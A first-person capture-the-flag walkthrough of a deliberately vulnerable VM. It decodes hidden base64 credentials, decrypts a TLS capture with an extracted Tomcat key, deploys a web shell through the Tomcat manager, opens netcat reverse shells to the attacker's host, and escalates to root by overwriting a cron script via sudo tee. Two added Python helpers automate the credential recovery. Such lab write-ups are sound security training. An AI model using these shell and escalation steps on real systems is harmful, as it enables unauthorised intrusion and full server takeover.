This is the first VM of a series. It was really interesting and fun!
First of all I performed an nmap scan, but I don't include the output here because 65389 ports showed up as open, which was really strange. With that many ports reporting open, the ones worth attention are those that answer with a real service; port 80 did, so I checked whether a website was running on the VM. I browsed to http://192.168.110.140 and the website appeared. Looking at the page source I discovered this:
<!------ Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->
It looks like a base64 encoded string, so I decoded it and this was the result:
cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh
Another base64 encoded string; decoding it again finally gave something interesting:
pgibbons:damnitfeel$goodtobeagang$ta
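As an added example (not code from the original write-up), a small Python helper that automates the step above and generalises it: it pulls every HTML comment out of a page, strips the extra dashes the page's comment uses, and keeps base64-decoding the token while the result is still base64 text, stopping as soon as the output is no longer base64 or is not printable UTF-8. The comment value is the one found in the page source; the surrounding HTML (`SAMPLE_HTML`) is constructed for the example.

```python
import base64
import binascii
import re

# Constructed stand-in for the target's index page; the comment value is the
# one found in the page source, the rest of the markup is illustrative.
SAMPLE_HTML = """<html><body>
<!------ Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->
<img src="images/bill.png">
</body></html>"""

HTML_COMMENT = "Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo"

_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
_COMMENT_RE = re.compile(r"<!--(.*?)-->", re.S)


def looks_like_base64(s: str) -> bool:
    """True if s uses only the base64 alphabet and has a valid (padded) length."""
    return len(s) % 4 == 0 and bool(_B64_RE.match(s))


def peel_base64(value: str, max_layers: int = 10):
    """Repeatedly base64-decode `value` until the result is no longer base64 text.

    Returns (plaintext, layers_removed). Decoding stops when the current text is
    not valid base64, fails to decode, or decodes to non-printable bytes (in which
    case the previous layer is treated as the real payload).
    """
    current = value.strip()
    for layer in range(max_layers):
        if not looks_like_base64(current):
            return current, layer
        try:
            decoded = base64.b64decode(current, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            return current, layer
        if not decoded.isprintable():
            return current, layer
        current = decoded
    return current, max_layers


def split_credentials(text: str):
    """Split a 'user:password' string; only the first ':' separates the fields."""
    user, _, password = text.partition(":")
    return user, password


def hidden_strings(html: str):
    """Return the decoded payload of every HTML comment that peels to plaintext."""
    found = []
    for body in _COMMENT_RE.findall(html):
        token = body.strip(" -\r\n\t")  # the page pads its comment with extra dashes
        plain, layers = peel_base64(token)
        if layers > 0:
            found.append(plain)
    return found


if __name__ == "__main__":
    for secret in hidden_strings(SAMPLE_HTML):
        user, password = split_credentials(secret)
        print(f"user={user} password={password}")
```

The printable check matters: a short plaintext such as `damn` is valid base64 by alphabet and length, and without the check the helper would "decode" it one layer too far.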
A username and a password; maybe they will be useful later. Before going further I scanned the website with DirBuster to find directories and found /images, which contains several images. I downloaded all of them and checked with exiftool whether they carried any interesting metadata. The image bill.png contains coffeestains as a comment. Next, clicking the image in the centre of the page redirects to another page from which the Employee Portal can be reached. It asks for a login, so I tried the credentials recovered from the page source and they worked!
The next step is to analyse the portal. First I noticed 3 unread messages in the user's inbox, so I read them. The first one was sent by the admin, who says that all sensitive information should be posted in the admin portal. The second and third discuss the purchase of an IDS/IPS system and contain a link to the keystore: http://192.168.110.140/.keystore. I downloaded it, since it is clearly important. Then I switched to the "View Account" section and found a comment by this user (Peter Gibbons) titled "SSL implementation test capture", with a link to a .pcap file: http://192.168.110.140/impresscms/_SSL_test_phase1.pcap, which I also downloaded. A useful piece of information in the comment is this:
They told me the alias, storepassword and keypassword are all set to 'tomcat'.
Remember the .keystore file? With the alias and passwords known I can extract the server's private key from it and decrypt the captured traffic. This command converts the downloaded keystore (saved here as keystore) into a PKCS12 file containing the tomcat key:
keytool -importkeystore -srckeystore keystore -destkeystore key.p12 -deststoretype PKCS12 -srcalias tomcat
keytool asks for a destination keystore password (I used tomcat again) and for the source keystore password (tomcat); the result is key.p12, which holds the private key. Now open Wireshark, go to Edit > Preferences > Protocols > SSL (called TLS in newer releases), click Edit... next to RSA keys list, press + and fill in the fields: IP 192.168.110.140, Port 8443, Protocol http, Key File the extracted key.p12, Password tomcat. Press OK and open the .pcap file. If everything is right you should see the Client Hello; right-click it and follow the SSL stream. Note that this works only because the capture uses an RSA key-exchange cipher suite: with (EC)DHE suites the server's private key does not recover the session keys, and you would need a key log from one of the endpoints instead. In the decrypted stream a user logs in to /_M@nag3Me/html; decoding the Basic Authorization header of the GET request gives tomcat:Tt\5D8F(#!*u=G)4m7zB as username and password. So just try it: browse to https://192.168.110.140:8443/_M@nag3Me/html and log in with those credentials. Now I am logged into the Tomcat manager.
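As an added example (not part of the original write-up), the credential-extraction step done programmatically in Python: the function walks a decrypted HTTP stream, cuts it at each request line, and returns the request path plus the decoded username and password for every request carrying an `Authorization: Basic` header. The stream below is a constructed stand-in for the Follow SSL Stream output (the first request is challenged with a 401, the retry carries the header); the header value is the base64 encoding of the tomcat credential quoted above, the other headers are illustrative.

```python
import base64
import binascii
import re

# Constructed stand-in for the "Follow SSL Stream" output (not the real capture).
# The Authorization value encodes the tomcat credential found in the capture;
# hosts, user agent and response headers are illustrative.
SAMPLE_STREAM = """GET /_M@nag3Me/html HTTP/1.1
Host: 192.168.110.140:8443
User-Agent: Mozilla/5.0

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Basic realm="Tomcat Manager Application"
Content-Length: 0

GET /_M@nag3Me/html HTTP/1.1
Host: 192.168.110.140:8443
User-Agent: Mozilla/5.0
Authorization: Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8

"""

_METHODS = r"(?:GET|POST|PUT|DELETE|HEAD|OPTIONS)"
_REQUEST_LINE = re.compile(rf"^({_METHODS}) (\S+) HTTP/1\.[01]\r?$", re.M)
_BASIC_HEADER = re.compile(r"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\s*$", re.M | re.I)


def split_requests(stream: str):
    """Cut the stream at every request line. Each chunk holds one request and
    whatever follows it (normally the server's response) up to the next request."""
    chunks = re.split(rf"(?m)^(?={_METHODS} \S+ HTTP/1\.[01])", stream)
    return [c for c in chunks if _REQUEST_LINE.search(c)]


def decode_basic(token: str):
    """Decode a Basic token into (user, password), or None if it is not valid.
    Only the first ':' separates the fields, so passwords may contain ':'."""
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = text.partition(":")
    return (user, password) if sep else None


def extract_basic_credentials(stream: str):
    """Return (path, user, password) for every request that carries Basic auth."""
    results = []
    for chunk in split_requests(stream):
        path = _REQUEST_LINE.search(chunk).group(2)
        for token in _BASIC_HEADER.findall(chunk):
            creds = decode_basic(token)
            if creds:
                results.append((path, *creds))
    return results


if __name__ == "__main__":
    for path, user, password in extract_basic_credentials(SAMPLE_STREAM):
        print(f"{path}: {user} / {password}")
```

Requests without the header (the first one, which only received the 401 challenge) are skipped, and a malformed token is ignored rather than aborting the whole pass.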
Now it's time to get a shell. Through the manager I can simply deploy a .war file (I used the Laudanum cmd.war). Once it was uploaded I browsed to https://192.168.110.140:8443/_M@nag3Me/cmd/cmd.jsp. Then I started a listener locally:
sudo nc -lvp 1234
Then I executed the following command through the web shell on the Tomcat server (this needs a netcat build that supports -e, which the target had):
nc 192.168.110.2 1234 -e /bin/bash
That gave me a reverse shell (the target connects back to my listener), but I needed a proper TTY, so I spawned one:
python -c 'import pty; pty.spawn("/bin/bash")'
Perfect, now I started to analyse the server. First I listed /home to see which users exist: blumbergh and milton. Remember the comment I found in an image with exiftool? Maybe it is the password of one of these users. So I tried to log in as blumbergh with coffeestains as the password, and it worked! Now I need to escalate my privileges. First I checked what the user can run as root with sudo -l:
This is the output:
(root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh
Let's look at what tidyup.sh does:
This is the important part:
#This script is set to run every 3 minutes as an additional defense measure against hackers.
Root runs this script every 3 minutes and I can overwrite it as root with tee, so I can write a reverse-shell one-liner into a temporary file and pipe it through sudo tee into the script. Note that tee without -a replaces the whole file, and the sudo rule only allows that exact command, so the original cleanup logic is lost; whatever you write is the complete script root will run. So let's create the file:
echo "nc 192.168.110.2 1235 -e /bin/bash" > /tmp/shell
And perform the trick:
cat /tmp/shell | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
Now listen locally:
sudo nc -lvp 1235
And wait for the cron job to fire and the shell to arrive. Once you have it, browse to /root and list the files:
There is a .flag.txt file, just cat it:
VM rooted and completed!